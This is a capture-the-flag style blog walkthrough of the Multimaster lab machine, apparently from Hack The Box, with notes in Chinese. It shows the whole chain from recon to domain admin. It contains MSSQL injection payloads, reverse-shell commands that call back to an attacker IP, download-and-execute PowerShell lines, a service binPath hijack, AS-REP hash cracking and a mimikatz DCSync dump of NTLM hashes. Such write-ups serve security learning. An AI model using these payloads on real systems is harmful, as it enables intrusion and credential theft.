Zumpyx Blog

Multimaster

Machines#232InsaneWindows

Recon & Enum

export IP=10.10.10.179

Recon

  • Nmap - Tcp
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: MegaCorp
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-30 01:11:09Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds  Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGACORP)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-01-30T01:12:41+00:00; +7m01s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: MEGACORP
|   NetBIOS_Domain_Name: MEGACORP
|   NetBIOS_Computer_Name: MULTIMASTER
|   DNS_Domain_Name: MEGACORP.LOCAL
|   DNS_Computer_Name: MULTIMASTER.MEGACORP.LOCAL
|   DNS_Tree_Name: MEGACORP.LOCAL
|   Product_Version: 10.0.14393
|_  System_Time: 2024-01-30T01:12:01+00:00
| ssl-cert: Subject: commonName=MULTIMASTER.MEGACORP.LOCAL
| Not valid before: 2024-01-29T01:05:39
|_Not valid after:  2024-07-30T01:05:39
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49700/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: MULTIMASTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h43m00s, deviation: 3h34m40s, median: 6m59s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: MULTIMASTER
|   NetBIOS computer name: MULTIMASTER\x00
|   Domain name: MEGACORP.LOCAL
|   Forest name: MEGACORP.LOCAL
|   FQDN: MULTIMASTER.MEGACORP.LOCAL
|_  System time: 2024-01-29T17:12:02-08:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-01-30T01:12:04
|_  start_date: 2024-01-30T01:05:48
  • 发现域名
export IP=10.10.10.179 DOMAIN=MEGACORP.LOCAL

SMB

  • crackmapexec
crackmapexec smb $IP -u guest -p '' --shares
crackmapexec smb $IP -u guest -p '' --rid-brute 10000

LDAP

  • ldapsearch
ldapsearch -x -H "ldap://$IP" -s base namingContexts
---
dn:
namingContexts: DC=MEGACORP,DC=LOCAL
namingContexts: CN=Configuration,DC=MEGACORP,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=MEGACORP,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=MEGACORP,DC=LOCAL

ldapsearch -x -H "ldap://$IP" -b "DC=MEGACORP,DC=LOCAL"
---
None

RPC

  • Enum4Linux
Domain Name: MEGACORP                                                  
Domain Sid: S-1-5-21-3167813660-1240564177-918740779

Web

image-20240130092250902.png

  • Web Scan
feroxbuster -u http://megacorp.local/ -d 1 -C 403
---
  • 发现用户

image-20240130093743686.png

sbauer
okent
ckane
kpage
shayna
james
cyork
rmartin
zac
jorden
alyx
ilee
nbourne
zpowers
aldom
minato
egre55
  • Kerbrute 枚举,均为域用户

image-20240130113607919.png

Shell as User - tushikikatomo

MSSQL 注入

https://swisskyrepo.github.io/PayloadsAllTheThings/SQL%20Injection/MSSQL%20Injection/

  • 测试注入,输入单引号会返回 403

image-20240130095205438.png

  • 尝试编码,成功报错

image-20240130095221943.png

  • 尝试闭合 ' or '1'='1 ,可以看到语句执行成功

image-20240130100213646.png

  • 枚举字段数 aaa' union select 1,2,3,4,5 -- -

image-20240130100609677.png

  • 枚举数据库 aaa' union select 1,@@VERSION,USER_NAME(),DB_NAME(),name FROM master..sysdatabases-- -

image-20240130101916048.png

Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64) 
        Aug 22 2017 17:04:49 
        Copyright (C) 2017 Microsoft Corporation
        Standard Edition (64-bit) on Windows Server 2016 Standard 10.0 <X64> (Build 14393: ) (Hypervisor)
User: finder

Hub_DB
master
model
msdb
tempdb
  • 枚举表 aaa' union select 1,DB_NAME(),table_name,4,5 from information_schema.tables-- -

image-20240130102118449.png

Colleagues
Logins
  • 枚举字段 aaa' union select 1,name,3,4,5 from syscolumns where id=(select id from sysobjects where name = 'Logins')-- -

image-20240130102617098.png

  • Dump 数据 aaa' union select id,username,password,4,5 from Hub_DB..Logins-- -

image-20240130102833199.png

9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739
fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813
9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739
9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739
9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739
fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813
9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739
fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813
fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813
9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739
cf17bb4919cab4729d835e734825ef16d47de2d9615733fcba3b6e0a7aa7c53edd986b64bf715d0a2df0015fd090babc
cf17bb4919cab4729d835e734825ef16d47de2d9615733fcba3b6e0a7aa7c53edd986b64bf715d0a2df0015fd090babc
  • Hash 识别发现,可能是 SHA-384 或者 Keccak-384,分别尝试后,正确编码应该是 Keccak-384

image-20240130104057166.png

  • Hashcat 爆破

image-20240130104300777.png

  • 密码喷射
crackmapexec smb $IP -u user.list -p pass.list --continue-on-success

image-20240130142946874.png

全部失败

MSSQL 枚举域用户

https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/

https://stackoverflow.com/questions/703019/convert-integer-to-hex-and-hex-to-integer

  • 可以通过 SUSER_SID() 来某个域用户的 SID aaa' union select 1,master.dbo.fn_varbintohexstr(suser_sid('MEGACORP\rmartin')),3,4,5-- - 其中域用户名可以通过在查询中进行 hex 编码绕过

image-20240130113444427.png

得到与用户 MEGACORP\rmartin 的 SID 为: 0x0105000000000005150000001c00d1bcd181f1492bdfc236240c0000 其中后 8 个字节为用户 RID

0x0105000000000005150000001c00d1bcd181f1492bdfc236240c0000
0x0105000000000005150000001c00d1bcd181f1492bdfc236
b'240c0000' - 0x0c24
  • 一般 Administrator 的 RID 为 500 - 0x000001f4 - b'f4010000', 尝试获取 Administrator 用户名 aaa' union select 1,suser_sname(0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000),3,4,5-- -

image-20240130135602201.png

  • 枚举 rid,500 - 10000
from pwn import p32
for i in range(500, 10000):
    print(p32(i).hex())

image-20240130142542879.png

Administrator
Guest
krbtgt
DefaultAccount
Domain Admins
Domain Users
Domain Guests
Domain Computers
Domain Controllers
Cert Publishers
Schema Admins
Enterprise Admins
Group Policy Creator Owners
Read-only Domain Controllers
Cloneable Domain Controllers
Key Admins
Enterprise Key Admins
RAS and IAS Servers
DnsAdmins
DnsUpdateProxy
svc-nas
Privileged IT Accounts
tushikikatomo
  • 使用 kerbrute 去掉用户组

image-20240130142746945.png

发现了两个新用户,再次尝试喷射密码

crackmapexec smb $IP -u user.list -p pass.list --continue-on-success

image-20240130143039328.png

export IP=10.10.10.179 DOMAIN=MEGACORP.LOCAL USER1=tushikikatomo PASS1=finance1
  • 登录成功

image-20240130143246654.png

  • 查询域用户

image-20240130145550112.png

Administrator
alyx
cyork
Guest
jorden
krbtgt
okent
sbauer
tushikikatomo
aldom
andrew
dai
ilee
jsmmons
lana
pmartin
svc-nas
zac
alice
ckane
DefaultAccount
james
kpage
nbourne
rmartin
svc-sql
zpowers
  • 再次喷射密码,未发现新的凭据

Bloodhound

Invoke-WebRequest -Uri http://10.10.16.12/SharpHound.exe -O sharphound.exe
./sharphound.exe -c all

image-20240130145407250.png

PEAS

Invoke-WebRequest -Uri http://10.10.16.12/winPEASx64.exe -O winpeas.exe	# 杀软会杀掉
IEX(New-Object Net.WebClient).DownloadString("http://10.10.16.12/winPEAS.ps1")

没啥发现

Shell as User - cyork

  • 发现一些主机程序

image-20240130150650258.png

image-20240130150534818.png

https://github.com/taviso/cefdebug

Visual Studio Code 是基于 Electron 构建的,如果开启了 debug 模式,在某些场景下,让受害者点击链接,即可反弹 Shell

  • cefdebug.exe
Invoke-WebRequest -Uri http://10.10.16.12/cefdebug.exe -O cefdebug.exe
./cefdebug.exe

image-20240130151327377.png

  • 向 ws 发送命令查看是否能够执行
./cefdebug.exe --url ws://127.0.0.1:47333/62f3e47e-aef0-4bec-904e-de5ea7763c39 --code "process.mainModule.require('child_process').exec('whoami > c:\\programdata\\whoami.txt')"
type c:/programdata/whoami.txt

image-20240130162600632.png

  • 反弹 Shell
./cefdebug.exe	# 使用 nc.exe 反弹,其他的都失败了。而且要选一个其他用户可以访问的目录
./cefdebug.exe --url ws://127.0.0.1:59355/8529154c-317e-43fa-adf8-bb4226d6c617 --code "process.mainModule.require('child_process').exec('\\\\10.10.16.12\\good\\nc.exe 10.10.16.12 2233 -e powershell')"

image-20240130170414296.png

  • cyork 属于开发者用户组,尝试查找敏感文件

image-20240130170647722.png

  • 发现 wwwroot 目录下有很多 dll 文件,开发者很有可能在测试期间把敏感信息加入调试,Multi master API 这个名字比较有趣

image-20240130171134043.png

Shell as User -sbauer

  • windows 多为 16-bit 编码,因此使用 strings 查看字符串,发现数据库的凭据
strings -e {b,l} MultimasterAPI.dll
---
...
HERE
NFORMATION_SCHEMA
ASTER
 "info" : "MegaCorp API" }
pplication/json
erver=localhost;database=Hub_DB;uid=finder;password=D3veL0pM3nT!;
elect * from Colleagues where name like '%{0}%'
osition
mail
mage
VS_VERSION_INFO
...
finder:D3veL0pM3nT!
  • 另外通过 cyork 查看域用户

image-20240130171809443.png

  • 全部添加到字典中,再次尝试密码喷洒,发现新的用户凭据

image-20240130172202238.png

export IP=10.10.10.179 DOMAIN=MEGACORP.LOCAL USER1=tushikikatomo PASS1=finance1 USER2=sbauer PASS2=D3veL0pM3nT!
  • 登录成功

image-20240130172424410.png

  • 查看权限,发现对 jorden 有 GenericWrite 权限,即可以更新 jorden 的属性

image-20240130172403108.png

  • 使 jorden 开启 “不需要预身份验证选项”,以此来进行 Kerberoasting 攻击
Get-ADUser Jorden | Set-ADAccountControl -doesnotrequirepreauth $true

Kerberoasting

impacket-GetNPUsers -dc-ip $IP -no-pass MEGACORP/jorden

image-20240130173126919.png

Shell as User - jorden

  • Hashcat
hashcat -m 18200 hash.list /usr/share/wordlists/rockyou.txt
---
$krb5asrep$23$jorden@MEGACORP:ce43857f47757defd140d7b62af56ff7$eec30c21fa6e6e88829aa1b9f145bc940fc3fbe7d68e8d53fe04bbfa6f212b8135becd6051616e42e6c73d9fb435207d28238ea96c9439c183cd84f40b8ae4c4d5c309f1fa7b07e187341cd6655a8814e730b687c482ddc6d1cc5c94acbdc676ae8a1b1373a58b6aac2f636bd05bd6492816f3482b3c803bbc9b2490a1cab893d12b261dcbc75262757c0fa02b240473b2336186acba925e2ec88de7878ce70cbab3bbbcb6976b7c8e9496a091d3c02cbc32d08a2053cb0dfe2913295a9e47308e9b5578632731fb91f5f5707497cf33eb6e146b522b143cddd86bb9a17b614b371f0f910e32cc2a1fb2:rainforest786
  • 登录成功
export IP=10.10.10.179 DOMAIN=MEGACORP.LOCAL USER1=tushikikatomo PASS1=finance1 USER2=sbauer PASS2=D3veL0pM3nT! USER3=jorden PASS3=rainforest786

image-20240130173559748.png

可以看到 jorden 具有 SeBackupPrivilege 权限,可以使用卷影备份,但是更快的方式应该是服务劫持

Shell as Root

  • 使用 reg 查询服务
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"

image-20240130180142912.png

找到一个不会影响系统的服务

  • 修改服务配置
sc.exe config browser binPath= "C:\Users\jorden\Documents\nc.exe -e powershell 10.10.16.12 2233"
sc create browser binPath= "C:\Users\jorden\Documents\nc.exe -e powershell 10.10.16.12 2233"
sc.exe stop browser
sc.exe config SamSs binPath= "C:\Users\jorden\Documents\nc.exe -e powershell 10.10.16.12 2233"
sc.exe start browser

image-20240130180519684.png

Dump Hash

./mimikatz.exe "lsadump::dcsync /domain:megacorp.local /all /csv" exit
---

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /domain:megacorp.local /all /csv
[DC] 'megacorp.local' will be the domain
[DC] 'MULTIMASTER.MEGACORP.LOCAL' will be the DC server
[DC] Exporting domain 'megacorp.local'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  06e3ae564999dbad74e576cdf0f717d3        514
2101    dai     cb8a655c8bc531dd01a5359b40b20e7b        66048
2102    svc-sql 3a36abdc15d86766d4cd243d8557e10d        66048
1103    svc-nas fe90dcf97ce6511a65151881708d6027        66048
1601    alice   19b44ab9ec562fe20b35ddb7c6fc0689        66048
1112    lana    3c3c292710286a539bbec397d15b4680        66048
1111    andrew  9e63ebcb217bf3c6b27056fdcb6150f7        66048
3114    zpowers b7c7e43caa54942a2e85d9c8b4074f04        66048
3104    ckane   b7c7e43caa54942a2e85d9c8b4074f04        66048
3112    ilee    b7c7e43caa54942a2e85d9c8b4074f04        66048
3103    okent   b7c7e43caa54942a2e85d9c8b4074f04        66048
3113    nbourne b7c7e43caa54942a2e85d9c8b4074f04        66048
3116    jsmmons b7c7e43caa54942a2e85d9c8b4074f04        66048
3106    james   b7c7e43caa54942a2e85d9c8b4074f04        66048
3109    zac     b7c7e43caa54942a2e85d9c8b4074f04        66048
3108    rmartin b7c7e43caa54942a2e85d9c8b4074f04        66048
3117    pmartin b7c7e43caa54942a2e85d9c8b4074f04        66048
3105    kpage   b7c7e43caa54942a2e85d9c8b4074f04        66048
3111    alyx    b7c7e43caa54942a2e85d9c8b4074f04        66048
3115    aldom   b7c7e43caa54942a2e85d9c8b4074f04        66048
500     Administrator   69cbf4a9b7415c9e1caf93d51d971be0        66048
1000    MULTIMASTER$    8563c4d2e37052edb6edeb1332ac7a94        532480
3107    cyork   06327297532725a64e1edec0aad81cfe        66048
1110    tushikikatomo   1c9c8bfd28d000e8904f23c280b25d21        66048
3102    sbauer  050ba67142895b5844a24d5ce9644702        66048
3110    jorden  90960176fcbfe36b4a69fafb3cc0b716        4260352

mimikatz(commandline) # exit
Bye!